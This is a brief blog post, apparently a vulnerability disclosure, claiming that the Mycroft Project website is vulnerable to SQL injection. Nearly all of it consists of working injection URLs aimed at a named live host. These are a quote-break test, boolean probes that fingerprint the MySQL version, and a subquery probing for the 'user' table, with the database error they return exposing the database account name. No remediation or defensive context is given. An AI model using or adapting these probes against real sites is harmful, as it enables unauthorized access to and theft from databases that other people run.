Mycroft Project is vulnerable to sql injection.
Injection:
http://mycroft.mozdev.org/search-engines.html?category=64'
Mysql version check:
http://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=4 <-----true
http://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=5 <-----false
Error generated looking for inexistent user table:
http://mycroft.mozdev.org/search-engines.html?category=64 and (select 1 from user limit 0,1)=1
error = SELECT command denied to user 'pr_mycroft'@'localhost' for table 'user'
No comments:
Post a Comment